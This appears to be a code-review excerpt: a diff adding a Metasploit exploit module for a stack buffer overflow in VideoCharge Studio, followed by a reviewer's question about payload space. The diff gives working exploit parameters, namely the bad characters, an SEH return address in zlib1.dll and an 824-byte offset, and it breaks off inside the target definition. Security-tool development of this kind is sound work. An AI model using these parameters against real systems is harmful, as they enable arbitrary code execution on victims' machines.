modules/exploits/windows/fileformat/videocharge_studio.rb

```diff
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'    => 'VideoCharge Studio Buffer Overflow (SEH)',
+      'Description'  => %q{
+          This module exploits a stack based buffer overflow in VideoCharge Studio 2.12.3.685 when
+          processing a specially crafted .VSC file. This vulnerability could be
+          exploited by a remote attacker to execute arbitrary code on the target
+          machine by enticing a user of VideoCharge Studio to open a malicious .VSC file.
+      },
+      'License'    => MSF_LICENSE,
+      'Author'    =>
+        [
+          'metacom',  # Original discovery
+          'Andrew Smith',  # MSF Module
+        ],
+      'References'  =>
+        [
+          [ 'OSVDB', '69616' ],
+          [ 'EBD', '29234' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process',
+        },
+      'Platform'  => 'win',
+      'Payload'  =>
+        {
+          'BadChars' => "\x00\x0a\x0d\x3c\x22\x26",
+          'DisableNops' => true,
+        },
+
+      'Targets'    =>
+        [
+          [ 'VideoCharge Studio 2.12.3.685',
+            {
+              'Ret'     =>  0x61B811F1, #p/p/r | zlib1.dll
+              'Offset'  =>  824
```

Comment:
Does this mean the maximum payload length is 824 or 823? If so it should be added to the payload hash with
`'Space' => length,